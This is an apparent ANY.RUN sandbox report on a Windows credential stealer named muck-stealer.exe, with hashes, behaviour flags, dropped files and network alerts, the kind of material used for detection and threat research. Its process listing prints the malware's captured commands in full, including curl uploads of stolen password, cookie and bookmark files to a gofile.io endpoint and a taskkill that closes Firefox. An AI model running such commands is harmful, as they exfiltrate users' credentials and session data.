File name:

muck-stealer.exe

Full analysis: https://app.any.run/tasks/d247ffa0-4e72-4f23-a45b-fa96922fcc7a
Verdict: Malicious activity
Threats:

Stealers are a group of malicious software that are intended for gaining unauthorized access to users’ information and transferring it to the attacker. The stealer malware category includes various types of programs that focus on their particular kind of data, including files, passwords, and cryptocurrency. Stealers are capable of spying on their targets by recording their keystrokes and taking screenshots. This type of malware is primarily distributed as part of phishing campaigns.

Malware Trends Tracker     >>>
Analysis date: December 13, 2024, 12:16:24
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
discord
evasion
stealer
python
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 6 sections
MD5:

644EF70F52B002746500CD1D43DB4B88

SHA1:

61134A96BDF0414A3A054ED47714727FA18E327F

SHA256:

ADD6D439CF4293B2105361DB9E0B7FCA9DF4CE2787443978E12F7B8A36075203

SSDEEP:

98304:dJ3d28zBU95PRInbdnnYQ620qCHWFMAli/UnQOxhTzg4GMDhOI8qbPGIkGAgcd3C:7wobmyrVanf7g8oq+UnpSwmP4yT

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Steals credentials from Web Browsers

      • muck-stealer.exe (PID: 6952)

    • Actions looks like stealing of personal data

      • muck-stealer.exe (PID: 6952)

  • SUSPICIOUS

    • Hides command output

      • cmd.exe (PID: 1920)

    • The process drops C-runtime libraries

      • muck-stealer.exe (PID: 6908)

    • Executable content was dropped or overwritten

      • muck-stealer.exe (PID: 6908)

    • Process drops legitimate windows executable

      • muck-stealer.exe (PID: 6908)

    • Process drops python dynamic module

      • muck-stealer.exe (PID: 6908)

    • Uses TASKKILL.EXE to kill Browsers

      • cmd.exe (PID: 1920)

    • Data upload via CURL

      • curl.exe (PID: 1668)
      • curl.exe (PID: 5792)
      • curl.exe (PID: 6884)
      • curl.exe (PID: 7012)
      • curl.exe (PID: 6220)
      • curl.exe (PID: 6280)
      • curl.exe (PID: 436)

    • Execution of CURL command

      • muck-stealer.exe (PID: 6952)

    • Checks for external IP

      • svchost.exe (PID: 2192)
      • muck-stealer.exe (PID: 6952)

    • Starts CMD.EXE for commands execution

      • muck-stealer.exe (PID: 6952)

    • Application launched itself

      • muck-stealer.exe (PID: 6908)

    • Loads Python modules

      • muck-stealer.exe (PID: 6952)

  • INFO

    • Reads the computer name

      • muck-stealer.exe (PID: 6908)
      • muck-stealer.exe (PID: 6952)
      • curl.exe (PID: 5792)
      • curl.exe (PID: 1668)
      • curl.exe (PID: 7012)
      • curl.exe (PID: 6884)
      • curl.exe (PID: 6220)
      • curl.exe (PID: 6280)

    • Checks supported languages

      • muck-stealer.exe (PID: 6908)
      • muck-stealer.exe (PID: 6952)
      • curl.exe (PID: 5792)
      • curl.exe (PID: 1668)
      • curl.exe (PID: 7012)
      • curl.exe (PID: 6280)
      • curl.exe (PID: 6220)
      • curl.exe (PID: 6884)

    • Create files in a temporary directory

      • muck-stealer.exe (PID: 6908)
      • muck-stealer.exe (PID: 6952)

    • Creates files or folders in the user directory

      • muck-stealer.exe (PID: 6952)

    • The sample compiled with english language support

      • muck-stealer.exe (PID: 6908)

    • Execution of CURL command

      • cmd.exe (PID: 4816)
      • cmd.exe (PID: 5320)
      • cmd.exe (PID: 6164)
      • cmd.exe (PID: 6416)
      • cmd.exe (PID: 6992)
      • cmd.exe (PID: 2092)
      • cmd.exe (PID: 236)

    • Attempting to use instant messaging service

      • svchost.exe (PID: 2192)
      • muck-stealer.exe (PID: 6952)

    • Checks proxy server information

      • muck-stealer.exe (PID: 6952)

    • Checks operating system version

      • muck-stealer.exe (PID: 6952)

    • Reads the machine GUID from the registry

      • muck-stealer.exe (PID: 6952)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2024:12:13 12:15:16+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.41
CodeSize: 172032
InitializedDataSize: 154624
UninitializedDataSize: -
EntryPoint: 0xce20
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows GUI
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
154
Monitored processes
31
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start muck-stealer.exe muck-stealer.exe cmd.exe no specs conhost.exe no specs cmd.exe no specs conhost.exe no specs svchost.exe taskkill.exe no specs cmd.exe no specs conhost.exe no specs curl.exe cmd.exe no specs conhost.exe no specs curl.exe cmd.exe no specs conhost.exe no specs curl.exe cmd.exe no specs conhost.exe no specs curl.exe cmd.exe no specs conhost.exe no specs curl.exe cmd.exe no specs conhost.exe no specs curl.exe cmd.exe no specs conhost.exe no specs curl.exe no specs rundll32.exe no specs muck-stealer.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
236C:\WINDOWS\system32\cmd.exe /c "curl -F "file=@C:\Users\admin\AppData\Local\Temp\coolmathgamesbookmarks.txt" https://store4.gofile.io/uploadFile"C:\Windows\System32\cmd.exemuck-stealer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
26
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
436curl -F "file=@C:\Users\admin\AppData\Local\Temp\coolmathgamesbookmarks.txt" https://store4.gofile.io/uploadFileC:\Windows\System32\curl.execmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
HIGH
Description:
The curl executable
Exit code:
26
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\ucrtbase.dll
1668curl -F "file=@C:\Users\admin\AppData\Local\Temp\coolmathgamescookies.txt" https://store4.gofile.io/uploadFileC:\Windows\System32\curl.exe
cmd.exe
User:
admin
Company:
curl, https://curl.se/
Integrity Level:
HIGH
Description:
The curl executable
Exit code:
0
Version:
8.4.0
Modules
Images
c:\windows\system32\curl.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\cryptsp.dll
1744\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1920C:\WINDOWS\system32\cmd.exe /c "taskkill /im firefox.exe /t /f >nul 2>&1"C:\Windows\System32\cmd.exemuck-stealer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
128
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
2092C:\WINDOWS\system32\cmd.exe /c "curl -F "file=@C:\Users\admin\AppData\Local\Temp\coolmathgamesparsedcookies.txt" https://store4.gofile.io/uploadFile"C:\Windows\System32\cmd.exemuck-stealer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
2192C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
3988C:\WINDOWS\System32\rundll32.exe C:\WINDOWS\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -EmbeddingC:\Windows\System32\rundll32.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows host process (Rundll32)
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\rundll32.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shcore.dll
c:\windows\system32\imagehlp.dll
4504taskkill /im firefox.exe /t /f C:\Windows\System32\taskkill.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Terminates Processes
Exit code:
128
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\taskkill.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
4816C:\WINDOWS\system32\cmd.exe /c "curl -F "file=@C:\Users\admin\AppData\Local\Temp\coolmathgamespasswords.txt" https://store4.gofile.io/uploadFile"C:\Windows\System32\cmd.exemuck-stealer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
Total events
22 707
Read events
22 707
Write events
0
Delete events
0

Modification events

No data
Executable files
112
Suspicious files
4
Text files
22
Unknown types
8

Dropped files

PID
Process
Filename
Type
6908muck-stealer.exeC:\Users\admin\AppData\Local\Temp\_MEI69082\Crypto\Cipher\_ARC4.pydexecutable
MD5:1DE465A3C16AE0C7B33B414B177C59CD
SHA256:87715695C50921D2578FAE6257830E4531D35644E9718C5C752BB52DEC2D3EFE
6908muck-stealer.exeC:\Users\admin\AppData\Local\Temp\_MEI69082\Crypto\Cipher\_chacha20.pydexecutable
MD5:78F5B1E8BED008EE0230BE48CB086071
SHA256:A81190A153181E8541FC7A60CA2C616CFEC22357CBC1F894B0F5A4BE4A46F75B
6908muck-stealer.exeC:\Users\admin\AppData\Local\Temp\_MEI69082\Crypto\Cipher\_Salsa20.pydexecutable
MD5:CE80D9506C7661774098D5E9B4A21509
SHA256:AD2BA10087B0AFC3394A319F1083BF0F3F67D0E3B4C89530EF227D6A0114C317
6908muck-stealer.exeC:\Users\admin\AppData\Local\Temp\_MEI69082\Crypto\Cipher\_raw_cfb.pydexecutable
MD5:1C4330CF8B8294CAB3790936C5D0C2CD
SHA256:32815077AE93BFEF7D3F29B42AB53A2EBCBA16D921443F38FA8A6493391A9F9B
6908muck-stealer.exeC:\Users\admin\AppData\Local\Temp\_MEI69082\Crypto\Cipher\_raw_des.pydexecutable
MD5:7364E01B7C7FEA734501E8BADD6B3FA9
SHA256:D50C788C2E4D10702F3D9CE8CFBAFB0242078937D78EBD4A414552D4C269C5AF
6908muck-stealer.exeC:\Users\admin\AppData\Local\Temp\_MEI69082\Crypto\Cipher\_raw_cbc.pydexecutable
MD5:7C240AB7BC11F5276B21155F043D8183
SHA256:65868D4BFDA255D2E7FE770E05093CC5E281B69CC49E29A25709840FAA1DB35A
6908muck-stealer.exeC:\Users\admin\AppData\Local\Temp\_MEI69082\Crypto\Cipher\_raw_aes.pydexecutable
MD5:B7790B60ECB15C9F69B9DC484D888516
SHA256:0D0177BE335ED0BD69B9F5579685991434F3F635AA466C69097BE40546B9156B
6908muck-stealer.exeC:\Users\admin\AppData\Local\Temp\_MEI69082\Crypto\Cipher\_raw_eksblowfish.pydexecutable
MD5:1190327CD437F1F4A2561E522AB18FC8
SHA256:15C4D6F45D47FB8C1176323F4A7DBEEAAA51C774DB43C496FF247780634BD781
6908muck-stealer.exeC:\Users\admin\AppData\Local\Temp\_MEI69082\Crypto\Cipher\_raw_blowfish.pydexecutable
MD5:112B3132A3D4CFCB5F24036C6F8A93C3
SHA256:616E5F0682CAE4A227596584FB345B419744E6B6EA144141BF34614C19E6DB46
6908muck-stealer.exeC:\Users\admin\AppData\Local\Temp\_MEI69082\Crypto\Hash\_BLAKE2s.pydexecutable
MD5:166910CB6469DB576D1F778F112A23C5
SHA256:978BD794414071848C8B1101777FB269864E0383B5D00BAB541BD8F78752FCAA
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
46
DNS requests
26
Threats
17

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
2.16.164.49:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
NL
binary
1.01 Kb
whitelisted
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
US
binary
471 b
whitelisted
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D
US
binary
314 b
whitelisted
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
DE
binary
973 b
whitelisted
6196
SIHClient.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
DE
binary
418 b
whitelisted
760
lsass.exe
GET
200
95.101.54.200:80
http://r11.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBQaUrm0WeTDM5ghfoZtS72KO9ZnzgQUCLkRO6XQhRi06g%2BgrZ%2BGHo78OCcCEgNBFe%2FLtaY4kXJ9034IQY5mQA%3D%3D
DE
binary
504 b
whitelisted
6196
SIHClient.exe
GET
200
88.221.169.152:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
DE
binary
408 b
whitelisted
6464
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D
US
binary
471 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4712
MoUsoCoreWorker.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
4
System
192.168.100.255:137
whitelisted
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
2.16.164.49:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
88.221.169.152:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
5064
SearchApp.exe
2.23.209.143:443
www.bing.com
Akamai International B.V.
GB
whitelisted
1176
svchost.exe
20.190.159.23:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
192.229.221.95:80
ocsp.digicert.com
EDGECAST
US
whitelisted
1076
svchost.exe
184.28.89.167:443
go.microsoft.com
AKAMAI-AS
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 51.124.78.146
  • 20.73.194.208
whitelisted
crl.microsoft.com
  • 2.16.164.49
  • 2.16.164.106
whitelisted
www.microsoft.com
  • 88.221.169.152
whitelisted
google.com
  • 142.250.186.110
whitelisted
www.bing.com
  • 2.23.209.143
  • 2.23.209.149
  • 2.23.209.150
  • 2.23.209.137
  • 2.23.209.142
  • 2.23.209.140
  • 2.23.209.156
  • 2.23.209.141
  • 2.23.209.144
whitelisted
login.live.com
  • 20.190.159.23
  • 20.190.159.2
  • 40.126.31.71
  • 40.126.31.69
  • 20.190.159.71
  • 20.190.159.4
  • 20.190.159.0
  • 40.126.31.67
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
go.microsoft.com
  • 184.28.89.167
whitelisted
discord.com
  • 162.159.128.233
  • 162.159.138.232
  • 162.159.137.232
  • 162.159.136.232
  • 162.159.135.232
whitelisted
checkip.amazonaws.com
  • 52.17.181.189
  • 54.195.26.29
  • 18.202.169.9
shared

Threats

PID
Process
Class
Message
2192
svchost.exe
Misc activity
ET INFO Observed Discord Domain in DNS Lookup (discord .com)
6952
muck-stealer.exe
Misc activity
ET INFO Observed Discord Domain (discord .com in TLS SNI)
2192
svchost.exe
Potentially Bad Traffic
ET INFO Online File Storage Domain in DNS Lookup (gofile .io)
6952
muck-stealer.exe
Misc activity
ET INFO File Sharing Related Domain in TLS SNI (gofile .io)
6952
muck-stealer.exe
Device Retrieving External IP Address Detected
ET INFO Observed External IP Lookup Domain (checkip .amazonaws .com) in TLS SNI
2192
svchost.exe
Device Retrieving External IP Address Detected
ET INFO External IP Lookup Domain in DNS Lookup (checkip .amazonaws .com)
2192
svchost.exe
Misc activity
ET INFO External IP Lookup Domain in DNS Lookup (geolocation-db .com)
6952
muck-stealer.exe
Misc activity
ET INFO External IP Lookup Domain (geolocation-db .com) in TLS SNI
2192
svchost.exe
Potentially Bad Traffic
ET INFO Online File Storage Domain in DNS Lookup (gofile .io)
5792
curl.exe
Misc activity
ET INFO File Sharing Related Domain in TLS SNI (gofile .io)
2 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
muck-stealer.exe